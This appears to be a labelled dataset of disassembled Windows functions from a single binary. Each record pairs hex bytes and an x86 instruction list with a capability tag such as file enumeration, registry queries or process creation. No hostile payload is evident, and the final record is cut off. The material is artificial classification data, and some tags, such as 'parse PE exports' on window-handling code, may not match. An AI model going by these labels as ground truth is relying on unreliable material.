a50515657ff158cf04b00508d4c2414e8e6a209008b6c24148b4b048d4424106a04f7d81bc023c5505151ff1588f04b00c7442410083a4e00c7442468010000008d4c2410e808a309008d44244850e8f62b02005f5e5d5b8b4c245064890d0000000083c45cc3
|
[
"push 0xffffffffffffffff",
"push 0x4b8570",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x50",
"mov ecx, dword [esp + 0x68]",
"xor eax, eax",
"cmp ecx, eax",
"mov dword [esp + 0x3c], eax",
"mov dword [esp + 0x38], eax",
"mov dword [esp + 0x48], eax",
"mov dword [esp + 0x4c], eax",
"mov dword [esp + 0x40], eax",
"mov dword [esp + 0x44], eax",
"je 0x41949e",
"lea eax, [esp + 0x38]",
"push eax",
"push ecx",
"mov ecx, dword [esp + 0x6c]",
"push ecx",
"call fcn.0043bad0",
"cmp eax, 1",
"jne 0x41949e",
"mov edx, dword [esp + 0x60]",
"push ebx",
"push ebp",
"mov ebp, dword [esp + 0x74]",
"push esi",
"push edi",
"mov eax, dword [ebp]",
"mov ebx, dword [ebp + 8]",
"mov esi, dword [ebp + 4]",
"mov ecx, dword [ebp + 0xc]",
"sub ebx, eax",
"sub ecx, esi",
"sub edx, 0",
"mov dword [esp + 0x10], ebx",
"mov dword [esp + 0x74], ecx",
"mov edi, eax",
"je 0x419407",
"dec edx",
"je 0x41933a",
"dec edx",
"jne 0x419490",
"mov eax, dword [esp + 0x78]",
"mov ebp, dword [eax + 4]",
"mov eax, dword [eax + 8]",
"cmp ebp, ebx",
"mov dword [esp + 0x70], ebp",
"mov dword [esp + 0x78], eax",
"mov dword [esp + 0x7c], eax",
"jg 0x41921f",
"mov eax, ebx",
"mov ebx, ebp",
"sub eax, ebp",
"mov dword [esp + 0x10], ebx",
"cdq",
"sub eax, edx",
"sar eax, 1",
"add edi, eax",
"mov edx, dword [esp + 0x78]",
"cmp edx, ecx",
"jg 0x41923c",
"mov eax, ecx",
"sub eax, edx",
"cdq",
"sub eax, edx",
"mov edx, dword [esp + 0x78]",
"sar eax, 1",
"add esi, eax",
"mov dword [esp + 0x74], edx",
"mov ecx, edx",
"cmp ebp, ebx",
"jg 0x419246",
"cmp dword [esp + 0x78], ecx",
"jle 0x4192ab",
"fild dword [esp + 0x70]",
"fild dword [esp + 0x10]",
"fdiv st(1)",
"fild dword [esp + 0x78]",
"fst qword [esp + 0x18]",
"fild dword [esp + 0x74]",
"fdiv st(1)",
"fstp qword [esp + 0x10]",
"fstp st(0)",
"fcom qword [esp + 0x10]",
"fnstsw ax",
"test ah, 1",
"jne 0x419275",
"fstp st(0)",
"fld qword [esp + 0x10]",
"fxch st(1)",
"fmul st(1)",
"call fcn.00489348",
"fld qword [esp + 0x18]",
"fmul st(1)",
"mov ebp, eax",
"call fcn.00489348",
"mov ecx, eax",
"mov eax, ebx",
"sub eax, ebp",
"mov dword [esp + 0x7c], ecx",
"cdq",
"fstp st(0)",
"sub eax, edx",
"sar eax, 1",
"add edi, eax",
"mov eax, dword [esp + 0x74]",
"sub eax, ecx",
"cdq",
"sub eax, edx",
"sar eax, 1",
"add esi, eax",
"mov eax, dword [esp + 0x7c]",
"push 0xcc0020",
"push eax",
"push ebp",
"push esi",
"lea ecx, [esp + 0x58]",
"push edi",
"push ecx",
"call fcn.0043bd30",
"mov ebx, dword [esp + 0x84]",
"test ebx, ebx",
"je 0x419490",
"mov dword [esp + 0x14], 0",
"mov dword [esp + 0x10], vtable.CRgn.0",
"mov edx, dword [esp + 0x7c]",
"add ebp, edi",
"add edx, esi",
"mov dword [esp + 0x68], 2",
"push edx",
"push ebp",
"push esi",
"push edi",
"call dword [sym.imp.GDI32.dll_CreateRectRgn]",
"push eax",
"lea ecx, [esp + 0x14]",
"call fcn.004b3741",
"mov ebp, dword [esp + 0x14]",
"mov ecx, dword [ebx + 4]",
"lea eax, [esp + 0x10]",
"push 4",
"neg eax",
"sbb eax, eax",
"and eax, ebp",
"push eax",
"push ecx",
"push ecx",
"call dword [sym.imp.GDI32.dll_CombineRgn]",
"mov dword [esp + 0x10], vtable.CGdiObject.0",
"mov dword [esp + 0x68], 3",
"lea ecx, [esp + 0x10]",
"jmp 0x41948b",
"add ecx, esi",
"cmp esi, ecx",
"jge 0x4193f3",
"mov ecx, dword [esp + 0x50]",
"mov edi, eax",
"lea edx, [eax + ebx]",
"cmp edi, edx",
"jge 0x4193dc",
"mov eax, dword [esp + 0x54]",
"add ecx, edi",
"add eax, esi",
"push eax",
"push ecx",
"push esi",
"lea ecx, [esp + 0x44]",
"push edi",
"push ecx",
"call dword [sym.imp.USER32.dll_SetRect]",
"mov edx, dword [esp + 0x80]",
"lea eax, [esp + 0x38]",
"push edx",
"lea ecx, [esp + 0x1c]",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"mov eax, dword [esp + 0x1c]",
"mov edx, dword [esp + 0x18]",
"mov ecx, dword [esp + 0x20]",
"mov dword [esp + 0x2c], eax",
"mov dword [esp + 0x28], edx",
"mov edx, dword [esp + 0x24]",
"lea eax, [esp + 0x28]",
"mov dword [esp + 0x30], ecx",
"push eax",
"mov dword [esp + 0x38], edx",
"call dword [sym.imp.USER32.dll_IsRectEmpty]",
"test eax, eax",
"jne 0x4193c8",
"push 0xcc0020",
"push 0xffffffffffffffff",
"push 0xffffffffffffffff",
"push esi",
"lea ecx, [esp + 0x58]",
"push edi",
"push ecx",
"call fcn.0043bd30",
"mov eax, dword [ebp]",
"mov ecx, dword [esp + 0x50]",
"add edi, ecx",
"lea edx, [eax + ebx]",
"cmp edi, edx",
"jl 0x419355",
"mov edx, dword [esp + 0x54]",
"mov edi, dword [esp + 0x74]",
"add esi, edx",
"mov edx, dword [ebp + 4]",
"add edx, edi",
"cmp esi, edx",
"jl 0x419348",
"mov ecx, dword [esp + 0x84]",
"test ecx, ecx",
"je 0x419490",
"jmp 0x41948b",
"push 0xcc0020",
"push 0xffffffffffffffff",
"push 0xffffffffffffffff",
"push esi",
"lea eax, [esp + 0x58]",
"push edi",
"push eax",
"call fcn.0043bd30",
"mov ebx, dword [esp + 0x84]",
"xor eax, eax",
"cmp ebx, eax",
"je 0x419490",
"mov dword [esp + 0x14], eax",
"mov dword [esp + 0x10], vtable.CRgn.0",
"mov ecx, dword [esp + 0x54]",
"mov edx, dword [esp + 0x50]",
"mov dword [esp + 0x68], eax",
"lea eax, [ecx + esi]",
"lea ecx, [edx + edi]",
"push eax",
"push ecx",
"push esi",
"push edi",
"call dword [sym.imp.GDI32.dll_CreateRectRgn]",
"push eax",
"lea ecx, [esp + 0x14]",
"call fcn.004b3741",
"mov ebp, dword [esp + 0x14]",
"mov ecx, dword [ebx + 4]",
"lea eax, [esp + 0x10]",
"push 4",
"neg eax",
"sbb eax, eax",
"and eax, ebp",
"push eax",
"push ecx",
"push ecx",
"call dword [sym.imp.GDI32.dll_CombineRgn]",
"mov dword [esp + 0x10], vtable.CGdiObject.0",
"mov dword [esp + 0x68], 1",
"lea ecx, [esp + 0x10]",
"call fcn.004b3798",
"lea eax, [esp + 0x48]",
"push eax",
"call fcn.0043c090",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"mov ecx, dword [esp + 0x50]",
"mov dword fs:[0], ecx",
"add esp, 0x5c",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x41cf60
|
[
"Enumerate files on windows"
] |
6aff68cb894b0064a100000000506489250000000081ec8001000053558be98d4c24088d454050e8ddf808008b4c2408c7842490010000000000008b41f885c074408d5424106a01528d4c2410e868ce08008b006888524f0050e8e5ca060083c4088d4c241085c00f95c3e824fb080084db740e6888524f008d4c240ce8a2fe080068648e4f008d4c240ce894fe08008b4c24088d4424485051ff15a0f34b0083f8ff8944240c75158d4c240889842490010000e8dbfa0800e9cb000000568bb4249c010000578b3d58f64b00bb23000000f64424501074698d54247c68608e4f0052e85cca060083c40885c074538d44247c685c8e4f0050e846ca060083c40885c0743d8b451c8d54241c526a008d8c24840000006800110000508974242cc74424300300ffffc744244c00000000c744245001000000894c2444895c2434ffd78b5424148d4c24505152ff1550f34b0085c00f8578ffffff8b44241450ff15a4f34b008b4d1c566a02680211000051ffd78d4c2410c7842498010000ffffffffe80dfa08005f5e8b8c24880100005d5b64890d0000000081c48c010000c20400
|
[
"push 0xffffffffffffffff",
"push 0x4b89cb",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x180",
"push ebx",
"push ebp",
"mov ebp, ecx",
"lea ecx, [esp + 8]",
"lea eax, [ebp + 0x40]",
"push eax",
"call fcn.004ac869",
"mov ecx, dword [esp + 8]",
"mov dword [esp + 0x190], 0",
"mov eax, dword [ecx - 8]",
"test eax, eax",
"je 0x41cfe2",
"lea edx, [esp + 0x10]",
"push 1",
"push edx",
"lea ecx, [esp + 0x10]",
"call fcn.004a9e1a",
"mov eax, dword [eax]",
"push 0x4f5288",
"push eax",
"call fcn.00489aa4",
"add esp, 8",
"lea ecx, [esp + 0x10]",
"test eax, eax",
"setne bl",
"call fcn.004acaf4",
"test bl, bl",
"je 0x41cfe2",
"push 0x4f5288",
"lea ecx, [esp + 0xc]",
"call fcn.004ace84",
"push 0x4f8e64",
"lea ecx, [esp + 0xc]",
"call fcn.004ace84",
"mov ecx, dword [esp + 8]",
"lea eax, [esp + 0x48]",
"push eax",
"push ecx",
"call dword [sym.imp.KERNEL32.dll_FindFirstFileA]",
"cmp eax, 0xffffffff",
"mov dword [esp + 0xc], eax",
"jne 0x41d01e",
"lea ecx, [esp + 8]",
"mov dword [esp + 0x190], eax",
"call fcn.004acaf4",
"jmp 0x41d0e9",
"push esi",
"mov esi, dword [esp + 0x19c]",
"push edi",
"mov edi, dword [sym.imp.USER32.dll_SendMessageA]",
"mov ebx, 0x23",
"test byte [esp + 0x50], 0x10",
"je 0x41d0a2",
"lea edx, [esp + 0x7c]",
"push 0x4f8e60",
"push edx",
"call fcn.00489aa4",
"add esp, 8",
"test eax, eax",
"je 0x41d0a2",
"lea eax, [esp + 0x7c]",
"push 0x4f8e5c",
"push eax",
"call fcn.00489aa4",
"add esp, 8",
"test eax, eax",
"je 0x41d0a2",
"mov eax, dword [ebp + 0x1c]",
"lea edx, [esp + 0x1c]",
"push edx",
"push 0",
"lea ecx, [esp + 0x84]",
"push 0x1100",
"push eax",
"mov dword [esp + 0x2c], esi",
"mov dword [esp + 0x30], 0xffff0003",
"mov dword [esp + 0x4c], 0",
"mov dword [esp + 0x50], 1",
"mov dword [esp + 0x44], ecx",
"mov dword [esp + 0x34], ebx",
"call edi",
"mov edx, dword [esp + 0x14]",
"lea ecx, [esp + 0x50]",
"push ecx",
"push edx",
"call dword [sym.imp.KERNEL32.dll_FindNextFileA]",
"test eax, eax",
"jne 0x41d032",
"mov eax, dword [esp + 0x14]",
"push eax",
"call dword [sym.imp.KERNEL32.dll_FindClose]",
"mov ecx, dword [ebp + 0x1c]",
"push esi",
"push 2",
"push 0x1102",
"push ecx",
"call edi",
"lea ecx, [esp + 0x10]",
"mov dword [esp + 0x198], 0xffffffff",
"call fcn.004acaf4",
"pop edi",
"pop esi",
"mov ecx, dword [esp + 0x188]",
"pop ebp",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0x18c",
"ret 4"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x41e340
|
[
"Query or enumerate registry value"
] |
8b4c24088b54240481ec0c0100008d44240056506a016a005152ff1508f04b008bf085f6753c8b5424048d4424088d4c240c50515652c744241804010000ff1500f04b008b8c241c0100008d44240c5051ff154cf34b008b54240452ff150cf04b008bc65e81c40c010000c20c00
|
[
"mov ecx, dword [esp + 8]",
"mov edx, dword [esp + 4]",
"sub esp, 0x10c",
"lea eax, [esp]",
"push esi",
"push eax",
"push 1",
"push 0",
"push ecx",
"push edx",
"call dword [sym.imp.ADVAPI32.dll_RegOpenKeyExA]",
"mov esi, eax",
"test esi, esi",
"jne 0x41e3a2",
"mov edx, dword [esp + 4]",
"lea eax, [esp + 8]",
"lea ecx, [esp + 0xc]",
"push eax",
"push ecx",
"push esi",
"push edx",
"mov dword [esp + 0x18], 0x104",
"call dword [sym.imp.ADVAPI32.dll_RegQueryValueA]",
"mov ecx, dword [esp + 0x11c]",
"lea eax, [esp + 0xc]",
"push eax",
"push ecx",
"call dword [sym.imp.KERNEL32.dll_lstrcpyA]",
"mov edx, dword [esp + 4]",
"push edx",
"call dword [sym.imp.ADVAPI32.dll_RegCloseKey]",
"mov eax, esi",
"pop esi",
"add esp, 0x10c",
"ret 0xc"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x41e3b0
|
[
"Create process on windows"
] |
6aff682b8b4b0064a100000000506489250000000081ec0c020000a1cc62500056578bf9894424088b4744c784241c0200000000000085c00f85fa0000008b4f488d77488b41f885c0751b8d4c2408c784241c020000ffffffffe8e5e6080033c0e94901000068a48e4f008d4c240ce80de80800568d4c240ce892ea08008b4c240853558bac242c020000556a006a0051689c8e4f006a00ff1524f44b008bf083fe200f87e40000008d5424148bcf5268948e4f006800000080e8d1feffff85c00f85c60000008b1d44f34b008d44241468808e4f0050ffd38d4c24148d542414515268000000808bcfe8a1feffff85c00f85960000008d44241468788e4f0050e8bac706008bf083c40885f6755d8d4c241468748e4f0051e822c706008bf083c40885f675458d54241452ff1574f34b008d740413eb378d574c8d4c240852e8ece608008b4424088b48f885c90f852affffff8d4c2408c784241c020000ffffffffe8dce5080033c0eb43c6060068708e4f0056ffd38b4424105056ffd38d4c24145551ff1548f34b008bf033d283fe200f9fc28d4c24108bf2c7842424020000ffffffffe899e508005d8bc65b8b8c24140200005f5e64890d0000000081c418020000c20400
|
[
"push 0xffffffffffffffff",
"push 0x4b8b2b",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x20c",
"mov eax, dword [0x5062cc]",
"push esi",
"push edi",
"mov edi, ecx",
"mov dword [esp + 8], eax",
"mov eax, dword [edi + 0x44]",
"mov dword [esp + 0x21c], 0",
"test eax, eax",
"jne 0x41e4e8",
"mov ecx, dword [edi + 0x48]",
"lea esi, [edi + 0x48]",
"mov eax, dword [ecx - 8]",
"test eax, eax",
"jne 0x41e416",
"lea ecx, [esp + 8]",
"mov dword [esp + 0x21c], 0xffffffff",
"call fcn.004acaf4",
"xor eax, eax",
"jmp 0x41e55f",
"push str.mailto:",
"lea ecx, [esp + 0xc]",
"call fcn.004acc31",
"push esi",
"lea ecx, [esp + 0xc]",
"call fcn.004acec0",
"mov ecx, dword [esp + 8]",
"push ebx",
"push ebp",
"mov ebp, dword [esp + 0x22c]",
"push ebp",
"push 0",
"push 0",
"push ecx",
"push 0x4f8e9c",
"push 0",
"call dword [sym.imp.SHELL32.dll_ShellExecuteA]",
"mov esi, eax",
"cmp esi, 0x20",
"ja 0x41e53d",
"lea edx, [esp + 0x14]",
"mov ecx, edi",
"push edx",
"push str..htm",
"push closesocket",
"call fcn.0041e340",
"test eax, eax",
"jne 0x41e53d",
"mov ebx, dword [sym.imp.KERNEL32.dll_lstrcatA]",
"lea eax, [esp + 0x14]",
"push str._shellopencommand",
"push eax",
"call ebx",
"lea ecx, [esp + 0x14]",
"lea edx, [esp + 0x14]",
"push ecx",
"push edx",
"push closesocket",
"mov ecx, edi",
"call fcn.0041e340",
"test eax, eax",
"jne 0x41e53d",
"lea eax, [esp + 0x14]",
"push 0x4f8e78",
"push eax",
"call fcn.0048ac70",
"mov esi, eax",
"add esp, 8",
"test esi, esi",
"jne 0x41e51c",
"lea ecx, [esp + 0x14]",
"push 0x4f8e74",
"push ecx",
"call fcn.0048abf0",
"mov esi, eax",
"add esp, 8",
"test esi, esi",
"jne 0x41e51c",
"lea edx, [esp + 0x14]",
"push edx",
"call dword [sym.imp.KERNEL32.dll_lstrlenA]",
"lea esi, [esp + eax + 0x13]",
"jmp 0x41e51f",
"lea edx, [edi + 0x4c]",
"lea ecx, [esp + 8]",
"push edx",
"call fcn.004acbe1",
"mov eax, dword [esp + 8]",
"mov ecx, dword [eax - 8]",
"test ecx, ecx",
"jne 0x41e42e",
"lea ecx, [esp + 8]",
"mov dword [esp + 0x21c], 0xffffffff",
"call fcn.004acaf4",
"xor eax, eax",
"jmp 0x41e55f",
"mov byte [esi], 0",
"push 0x4f8e70",
"push esi",
"call ebx",
"mov eax, dword [esp + 0x10]",
"push eax",
"push esi",
"call ebx",
"lea ecx, [esp + 0x14]",
"push ebp",
"push ecx",
"call dword [sym.imp.KERNEL32.dll_WinExec]",
"mov esi, eax",
"xor edx, edx",
"cmp esi, 0x20",
"setg dl",
"lea ecx, [esp + 0x10]",
"mov esi, edx",
"mov dword [esp + 0x224], 0xffffffff",
"call fcn.004acaf4",
"pop ebp",
"mov eax, esi",
"pop ebx",
"mov ecx, dword [esp + 0x214]",
"pop edi",
"pop esi",
"mov dword fs:[0], ecx",
"add esp, 0x218",
"ret 4"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x42a7a0
|
[
"Resolve function by parsing pe exports"
] |
81ecd400000053555633f657565668e9030000c74424386400000089742424e8bc2500008be8568b9c24ec00000056896c24588d7b148bcf897c241ce8afcfffff3bc60f845105000039b424ec00000075418d701856e80595feff03f056e8fd94feff03f083c4088b3685f674238b461c50ff154cf64b0085c074158b86b401000085c074206a006a008bcee83f65000033f683bc24f400000001755489b424f8000000eb658b4e1c51ff1578f54b0085c0741b6a098bcee8446608005f5e5db8010000005b81c4d4000000c214008b561c52ff15f4f54b0050e84e3c08005f5e5db8010000005b81c4d4000000c214008b8424f80000003bc6740f50ff154cf64b0085c00f848f040000565668d9070000e8c92400008d4b3457894c2424e85cceffff538bcde884d4ffff3bc68944244c0f84620400008d8424b40000008bcf5089b424a000000089742414e8bedaffff3bc6897424287e278b9424b40000008d4c24285651566aff5056528bcfe87cceffff50e8d6e8000083c418894424108d4c2454e8f689feffbeaccf4d008d4c247c89742454e8e489feff8d4c24688974247ce8d789feff8d4c243489742468e8ca89feff8b73188bde8974243085f6895c241c0f8ebe0200008bfb8b4c24142bfe6a00f7df1bff23fb57e80fceffff8be885ed0f849e0200008b4c241457e82bd6ffff83f801750a4b895c241ce97d0200008b45006a005068ea030000e8cc2300008bd885db0f848b0300008b432c85c00f84800300006a01ffd085c0894424240f84700300008d751856e81e93feff03f056e81693feff83c4088d8c249000000003f051558b6c241c897424508bcd83c604e8d6d5ffff578bcd898424ac000000e8c7cdffff8b53148d4c2468c1ea0883e201898424b000000052e87d8bfeff8b068b4e048b5608898424940000008b460c83c618898c24a4000000898424ac0000008b0e899424a000000033ed8b548e048d448e048d74100456e88d92feff8b4b148d74060483c4048b06f6c58089842498000000740c558d4c2438e89b8bfeffeb378b8c24ec00000085c9741185ff750d6a018d4c2438e87f8bfeffeb1b24018d4c243450e8718bfefff6842498000000027405bd00000008f684249800000004740681cd0000010085ff0f85a90000008b8424f40000008b4c244c8b9424ac000000578b5c2414578bbc24b8000000a3147751008b8424a800000057518b8c24b4000000528b9424a8000000508b842410010000518b8c24ac000000528b9424c8000000536a0050555152ff54245c8bf033ed3bf5892d14775100897424180f845a0100008b461c3bc58984249c0000000f844801000050ff154cf64b0085c00f84390100008b8424ec000000896c24108986d8000000eb5e8bbc24b00000008b4c244c8b9424ac0000008b8424a00000006a008b5c24306a0057518b8c24b4000000528b9424a8000000508b44243051528b481c8b9424b00000008b8424c80000006a005351555250ff54245c83c30a8bf0895c242c85f60f84e50000008b4c24485789318d4c2458e8ab89feff568d8c2480000000e89e89feff8b44241c8b742430488944241c8bd885db0f8f42fdffff8b4424788b742470f7d81bc08b4c245c23c68b9c2484000000894424488b4424648bf88b54243cf7df1bff8b74241423f98b8c248c000000f7d91bc923cbbb01000000894c24208b4c2444f7d91bc9895c241023cac1e802894c24248944241c6a00538bcee8fdcaffff8be885ed0f84b5010000538bcee81bd3ffff83f8010f85c400000043895c2410ebd48b4424283bc5740750ff1588f54b003bdd740753ff151cf64b008b4c24208b11ff5208eb278b44242885c0740750ff1588f54b008b44241085c0740750ff151cf64b008b4c24208b01ff5008bea8cf4d008d4c243489742434e80d88feff8d4c246889742468e80088feff8d4c247c8974247ce8f387feff8d4c245489742454e8e687feff5f5e5d33c05b81c4d4000000c214008b44242885c0740750ff1588f54b008b44241085c0740750ff151cf64b008b4c24208b11ff5208eb8f8b4424108b4c241450e860caffff508b4c24205157e8b48ffeff8b54242c8bd88d75188b049a5689442440e85e8ffeff03f056e8568ffeff8d74301883c4148b0685c074188b4c241c505157e87d8ffeff8b54242c83c40c8b0482eb048b44241885c074038b401c508b4424348b481c51ff1550f64b0050e8de3608008b542448833c9a0074458b460483c60483c60485c07e38833e00740a4883c60485c07ff3eb2985c07e258b5c24248be88b0685c07413508b4424205057e80f8ffeff83c40cc604180083c6044d75e18b4424108b74241440894424108bd8e937feffffbb01000000895c24106a00538bcee82bc9ffff8bf885ff0f84e9000000538bcee849d1ffff83f801750343ebd883c71857e8788efeff03f857e8708efeff8b5424188b0c388b6c381803c78bc283c40883f802894c242c8d5aff7c396a00538bcee8d8c8ffff538bce8bf8e8fed0ffff85c0751b83c71857e8318efeff03f857e8298efeff03f883c408396f1874304b83fb017dc78b44242c6a136a006a008b481c6a006a006a0051ff155cf64b008b44241040894424108bd8e94affffff83fb017cd16a00538bcee870c8ffff85c074dd8d781857e8d38dfeff03f857e8cb8dfeff03f883c4088b3f85ff74c18b4c242c8b471c6a136a008b511c6a006a006a005052eba333f68b5c24148bc66a00508bcb46e825c8ffff8bf885ff74668d56ff8bcb52e844d0ffff83f80174d98d5f188bfb57e8748dfeff03f857e86c8dfeff8b4c071c8d44071c8bfb578d6c8804e8588dfeff03f857e8508dfeff8d7c38148b450083c41085c07e1183c5045055e8b8b1000083c4088907eb8bc70700000000eb838b9424e80000008b5a184b78698d730133ed8b4c24148bc3554b504ee898c7ffff8bf83bfd74518b4c241456e8b8cfffff85c0753b83c71857e8eb8cfeff03f857e8e38cfeff03f883c4088b3f3bfd741f8b471c50ff154cf64b0085c074118b4f1c5555686f80000051ff1558f64b003bdd7d9eeb0233ed8b542418555568048000008b421c50ff1558f64b00bf010000008b74241c3bf77e2c8b4c24208b6c24248d59048a142f8b0bfecaf6da1bd283e2f883c20852e80e5e08004783c3043bfe7ce133ed8b4424188b80dc0100003bc5740750ff1588f54b008b5424188b4c2428555568da070000898adc010000e8b41c0000558b4c2418e80ac7ffff8bf88d8424b80000008b74244c555068d807000089b424c400000089bc24c800000089ac24cc00000089ac24d000000089ac24e800000089ac24ec000000e8671c00008b9c249c00000053ff154cf64b0085c00f84510200008d8c24b8000000555168d807000089b424c400000089bc24c8000000c78424cc0000000300000089ac24d000000089ac24e800000089ac24ec000000e8101c000053ff154cf64b0085c00f84010200008d9424b8000000555268d807000089b424c400000089bc24c8000000c78424cc0000000400000089ac24d000000089ac24e800000089ac24ec000000e8c01b000053ff154cf64b0085c00f84b10100008b4424448b54243cf7d81bc023c2803800741b8b8424ec0000008b8c24e8000000505156b900735100e893f4ffff53ff154cf64b0085c00f84c40000008b8c24f4000000b8010000003bc80f85b00000008b54241833f68982bc0100008d4c24308bc6518b4c24545046e862cbffff85c00f848a0000008b4424308b8c24e80000003bc174d755558d4814e831c5ffff8bf883c71857e8968afeff03f857e88e8afeff03f883c4088b3f3bfd74af8b571c52ff154cf64b0085c074a18b471c50ff1540f64b0050e83232080085c0758d8b4c24188b571c528d99c00100008bcbe8fc82feff8bcfe80d5c0800508bcbe8ed82feff558bcfe8185c0800e95cffffffff153cf64b008bf08b8424e8000000897424508b58184b78698d73018b4c24148bc3554b504ee895c4ffff8bf83bfd744d8b4c241456e8b5ccffff85c0753b83c71857e8e889feff03f857e8e089feff03f883c4088b3f3bfd741f8b4f1c51ff154cf64b0085c074118b571c5555687680000052ff1558f64b003bdd7d9e8b7424503bf5741c56ff154cf64b0085c07411ff153cf64b003bc6740756ff157cf54b008b442418c780b801000001000000bea8cf4d008d4c243489742434e88e81feff8d4c246889742468e88181feff8d4c247c8974247ce87481feff8d4c245489742454e86781feff5f5e5db8010000005b81c4d4000000c21400
|
[
"sub esp, 0xd4",
"push ebx",
"push ebp",
"push esi",
"xor esi, esi",
"push edi",
"push esi",
"push esi",
"push 0x3e9",
"mov dword [esp + 0x38], 0x64",
"mov dword [esp + 0x24], esi",
"call fcn.0042cd80",
"mov ebp, eax",
"push esi",
"mov ebx, dword [esp + 0xec]",
"push esi",
"mov dword [esp + 0x58], ebp",
"lea edi, [ebx + 0x14]",
"mov ecx, edi",
"mov dword [esp + 0x1c], edi",
"call fcn.00427790",
"cmp eax, esi",
"je 0x42ad3a",
"cmp dword [esp + 0xec], esi",
"jne 0x42a833",
"lea esi, [eax + 0x18]",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"add esp, 8",
"mov esi, dword [esi]",
"test esi, esi",
"je 0x42a831",
"mov eax, dword [esi + 0x1c]",
"push eax",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42a831",
"mov eax, dword [esi + 0x1b4]",
"test eax, eax",
"je 0x42a846",
"push 0",
"push 0",
"mov ecx, esi",
"call fcn.00430d70",
"xor esi, esi",
"cmp dword [esp + 0xf4], 1",
"jne 0x42a891",
"mov dword [esp + 0xf8], esi",
"jmp 0x42a8ab",
"mov ecx, dword [esi + 0x1c]",
"push ecx",
"call dword [sym.imp.USER32.dll_IsIconic]",
"test eax, eax",
"je 0x42a86f",
"push 9",
"mov ecx, esi",
"call fcn.004b0ea1",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0xd4",
"ret 0x14",
"mov edx, dword [esi + 0x1c]",
"push edx",
"call dword [sym.imp.USER32.dll_SetActiveWindow]",
"push eax",
"call fcn.004ae4cd",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0xd4",
"ret 0x14",
"mov eax, dword [esp + 0xf8]",
"cmp eax, esi",
"je 0x42a8ab",
"push eax",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42ad3a",
"push esi",
"push esi",
"push 0x7d9",
"call fcn.0042cd80",
"lea ecx, [ebx + 0x34]",
"push edi",
"mov dword [esp + 0x24], ecx",
"call fcn.00427720",
"push ebx",
"mov ecx, ebp",
"call fcn.00427d50",
"cmp eax, esi",
"mov dword [esp + 0x4c], eax",
"je 0x42ad3a",
"lea eax, [esp + 0xb4]",
"mov ecx, edi",
"push eax",
"mov dword [esp + 0xa0], esi",
"mov dword [esp + 0x14], esi",
"call fcn.004283b0",
"cmp eax, esi",
"mov dword [esp + 0x28], esi",
"jle 0x42a921",
"mov edx, dword [esp + 0xb4]",
"lea ecx, [esp + 0x28]",
"push esi",
"push ecx",
"push esi",
"push 0xffffffffffffffff",
"push eax",
"push esi",
"push edx",
"mov ecx, edi",
"call fcn.00427790",
"push eax",
"call fcn.004391f0",
"add esp, 0x18",
"mov dword [esp + 0x10], eax",
"lea ecx, [esp + 0x54]",
"call fcn.00413320",
"mov esi, 0x4dcfac",
"lea ecx, [esp + 0x7c]",
"mov dword [esp + 0x54], esi",
"call fcn.00413320",
"lea ecx, [esp + 0x68]",
"mov dword [esp + 0x7c], esi",
"call fcn.00413320",
"lea ecx, [esp + 0x34]",
"mov dword [esp + 0x68], esi",
"call fcn.00413320",
"mov esi, dword [ebx + 0x18]",
"mov ebx, esi",
"mov dword [esp + 0x30], esi",
"test esi, esi",
"mov dword [esp + 0x1c], ebx",
"jle 0x42ac29",
"mov edi, ebx",
"mov ecx, dword [esp + 0x14]",
"sub edi, esi",
"push 0",
"neg edi",
"sbb edi, edi",
"and edi, ebx",
"push edi",
"call fcn.00427790",
"mov ebp, eax",
"test ebp, ebp",
"je 0x42ac29",
"mov ecx, dword [esp + 0x14]",
"push edi",
"call fcn.00427fc0",
"cmp eax, 1",
"jne 0x42a9a4",
"dec ebx",
"mov dword [esp + 0x1c], ebx",
"jmp 0x42ac21",
"mov eax, dword [ebp]",
"push 0",
"push eax",
"push 0x3ea",
"call fcn.0042cd80",
"mov ebx, eax",
"test ebx, ebx",
"je 0x42ad49",
"mov eax, dword [ebx + 0x2c]",
"test eax, eax",
"je 0x42ad49",
"push 1",
"call eax",
"test eax, eax",
"mov dword [esp + 0x24], eax",
"je 0x42ad49",
"lea esi, [ebp + 0x18]",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"add esp, 8",
"lea ecx, [esp + 0x90]",
"add esi, eax",
"push ecx",
"push ebp",
"mov ebp, dword [esp + 0x1c]",
"mov dword [esp + 0x50], esi",
"mov ecx, ebp",
"add esi, 4",
"call fcn.00427fe0",
"push edi",
"mov ecx, ebp",
"mov dword [esp + 0xac], eax",
"call fcn.004277e0",
"mov edx, dword [ebx + 0x14]",
"lea ecx, [esp + 0x68]",
"shr edx, 8",
"and edx, 1",
"mov dword [esp + 0xb0], eax",
"push edx",
"call fcn.004135b0",
"mov eax, dword [esi]",
"mov ecx, dword [esi + 4]",
"mov edx, dword [esi + 8]",
"mov dword [esp + 0x94], eax",
"mov eax, dword [esi + 0xc]",
"add esi, 0x18",
"mov dword [esp + 0xa4], ecx",
"mov dword [esp + 0xac], eax",
"mov ecx, dword [esi]",
"mov dword [esp + 0xa0], edx",
"xor ebp, ebp",
"mov edx, dword [esi + ecx*4 + 4]",
"lea eax, [esi + ecx*4 + 4]",
"lea esi, [eax + edx + 4]",
"push esi",
"call fcn.00413d00",
